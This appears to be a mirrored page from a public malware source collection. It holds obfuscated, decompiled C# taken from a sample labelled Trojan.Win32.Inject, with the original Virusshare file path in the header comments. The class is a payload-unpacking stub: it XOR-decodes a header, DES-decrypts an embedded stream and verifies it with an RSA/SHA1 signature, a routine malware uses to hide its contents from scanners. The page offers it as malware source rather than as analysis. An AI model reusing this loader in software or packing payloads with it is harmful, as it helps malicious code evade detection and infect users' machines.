mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
160 lines
5.9 KiB
C#
160 lines
5.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Security.Cryptography;
|
|||
|
|
|||
|
internal class \uE00C
|
|||
|
{
|
|||
|
private const int \uE000 = 8;
|
|||
|
private const int \uE001 = 20;
|
|||
|
private const int \uE002 = 4;
|
|||
|
private static byte[] \uE003 = new byte[4];
|
|||
|
private static byte[] \uE004 = new byte[4];
|
|||
|
|
|||
|
static \uE00C()
|
|||
|
{
|
|||
|
\uE00C.\uE003[0] = \uE00C.\uE004[0] = (byte) 82;
|
|||
|
\uE00C.\uE003[1] = \uE00C.\uE004[1] = (byte) 83;
|
|||
|
\uE00C.\uE003[2] = \uE00C.\uE004[2] = (byte) 65;
|
|||
|
\uE00C.\uE003[3] = (byte) 49;
|
|||
|
\uE00C.\uE004[3] = (byte) 50;
|
|||
|
}
|
|||
|
|
|||
|
public static MemoryStream \uE000(Stream _param0)
|
|||
|
{
|
|||
|
BinaryReader binaryReader1 = new BinaryReader(_param0);
|
|||
|
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
|
|||
|
bool flag1 = binaryReader1.ReadBoolean();
|
|||
|
int count1 = (int) binaryReader1.ReadUInt16();
|
|||
|
byte[] buffer1 = new byte[count1];
|
|||
|
binaryReader1.Read(buffer1, 0, count1);
|
|||
|
if (flag1)
|
|||
|
{
|
|||
|
byte[] buffer2 = new byte[8];
|
|||
|
binaryReader1.Read(buffer2, 0, 8);
|
|||
|
for (int index = 0; index < count1; ++index)
|
|||
|
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
|
|||
|
}
|
|||
|
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
|
|||
|
int count2 = (int) binaryReader2.ReadByte();
|
|||
|
byte[] buffer3 = new byte[count2];
|
|||
|
binaryReader2.Read(buffer3, 0, count2);
|
|||
|
cryptoServiceProvider1.IV = buffer3;
|
|||
|
bool flag2 = binaryReader2.ReadBoolean();
|
|||
|
int count3 = (int) binaryReader2.ReadByte();
|
|||
|
byte[] numArray = new byte[count3];
|
|||
|
if (flag2)
|
|||
|
binaryReader2.Read(numArray, 0, count3);
|
|||
|
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
|
|||
|
int count4 = binaryReader2.ReadInt32();
|
|||
|
byte[] buffer4 = new byte[count4];
|
|||
|
binaryReader2.Read(buffer4, 0, count4);
|
|||
|
if (!flag2)
|
|||
|
{
|
|||
|
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
|
|||
|
if (publicKey == null || publicKey.Length != 160)
|
|||
|
throw new InvalidOperationException();
|
|||
|
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count3);
|
|||
|
numArray[5] |= (byte) 128;
|
|||
|
cryptoServiceProvider2 = new RSACryptoServiceProvider();
|
|||
|
cryptoServiceProvider2.ImportParameters(\uE00C.\uE000(publicKey));
|
|||
|
}
|
|||
|
cryptoServiceProvider1.Key = numArray;
|
|||
|
MemoryStream memoryStream = new MemoryStream();
|
|||
|
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
|
|||
|
\uE012.\uE000((Stream) cryptoStream, (Stream) memoryStream);
|
|||
|
if (cryptoServiceProvider2 != null)
|
|||
|
{
|
|||
|
memoryStream.Position = 0L;
|
|||
|
if (!\uE00C.\uE000(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
|
|||
|
throw new InvalidOperationException();
|
|||
|
}
|
|||
|
memoryStream.Position = 0L;
|
|||
|
return memoryStream;
|
|||
|
}
|
|||
|
|
|||
|
private static byte[] \uE000(byte[] _param0, int _param1, int _param2)
|
|||
|
{
|
|||
|
if (_param0 == null || _param0.Length < _param1 + _param2)
|
|||
|
return (byte[]) null;
|
|||
|
byte[] destinationArray = new byte[_param2];
|
|||
|
Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
|
|||
|
return destinationArray;
|
|||
|
}
|
|||
|
|
|||
|
private static RSAParameters \uE000(byte[] _param0)
|
|||
|
{
|
|||
|
bool flag = _param0.Length == 160;
|
|||
|
if (flag && !\uE00C.\uE000(_param0, \uE00C.\uE003, 20))
|
|||
|
{
|
|||
|
RSAParameters rsaParameters = new RSAParameters();
|
|||
|
ref RSAParameters local = ref rsaParameters;
|
|||
|
return rsaParameters;
|
|||
|
}
|
|||
|
if (!flag && !\uE00C.\uE000(_param0, \uE00C.\uE004, 8))
|
|||
|
{
|
|||
|
RSAParameters rsaParameters = new RSAParameters();
|
|||
|
ref RSAParameters local = ref rsaParameters;
|
|||
|
return rsaParameters;
|
|||
|
}
|
|||
|
RSAParameters rsaParameters1 = new RSAParameters();
|
|||
|
int num1 = (flag ? 20 : 8) + 8;
|
|||
|
int num2 = 4;
|
|||
|
rsaParameters1.Exponent = \uE00C.\uE000(_param0, num1, num2);
|
|||
|
Array.Reverse((Array) rsaParameters1.Exponent);
|
|||
|
int num3 = num1 + num2;
|
|||
|
int num4 = 128;
|
|||
|
rsaParameters1.Modulus = \uE00C.\uE000(_param0, num3, num4);
|
|||
|
Array.Reverse((Array) rsaParameters1.Modulus);
|
|||
|
if (flag)
|
|||
|
return rsaParameters1;
|
|||
|
int num5 = num3 + num4;
|
|||
|
int num6 = 64;
|
|||
|
rsaParameters1.P = \uE00C.\uE000(_param0, num5, num6);
|
|||
|
Array.Reverse((Array) rsaParameters1.P);
|
|||
|
int num7 = num5 + num6;
|
|||
|
int num8 = 64;
|
|||
|
rsaParameters1.Q = \uE00C.\uE000(_param0, num7, num8);
|
|||
|
Array.Reverse((Array) rsaParameters1.Q);
|
|||
|
int num9 = num7 + num8;
|
|||
|
int num10 = 64;
|
|||
|
rsaParameters1.DP = \uE00C.\uE000(_param0, num9, num10);
|
|||
|
Array.Reverse((Array) rsaParameters1.DP);
|
|||
|
int num11 = num9 + num10;
|
|||
|
int num12 = 64;
|
|||
|
rsaParameters1.DQ = \uE00C.\uE000(_param0, num11, num12);
|
|||
|
Array.Reverse((Array) rsaParameters1.DQ);
|
|||
|
int num13 = num11 + num12;
|
|||
|
int num14 = 64;
|
|||
|
rsaParameters1.InverseQ = \uE00C.\uE000(_param0, num13, num14);
|
|||
|
Array.Reverse((Array) rsaParameters1.InverseQ);
|
|||
|
int num15 = num13 + num14;
|
|||
|
int num16 = 128;
|
|||
|
rsaParameters1.D = \uE00C.\uE000(_param0, num15, num16);
|
|||
|
Array.Reverse((Array) rsaParameters1.D);
|
|||
|
return rsaParameters1;
|
|||
|
}
|
|||
|
|
|||
|
private static bool \uE000(byte[] _param0, byte[] _param1, int _param2)
|
|||
|
{
|
|||
|
for (int index = 0; index < _param1.Length; ++index)
|
|||
|
{
|
|||
|
if ((int) _param0[index + _param2] != (int) _param1[index])
|
|||
|
return false;
|
|||
|
}
|
|||
|
return true;
|
|||
|
}
|
|||
|
|
|||
|
private static bool \uE000(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
|
|||
|
{
|
|||
|
byte[] hash = new SHA1Managed().ComputeHash(_param1);
|
|||
|
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID("SHA1"), _param2);
|
|||
|
}
|
|||
|
}
|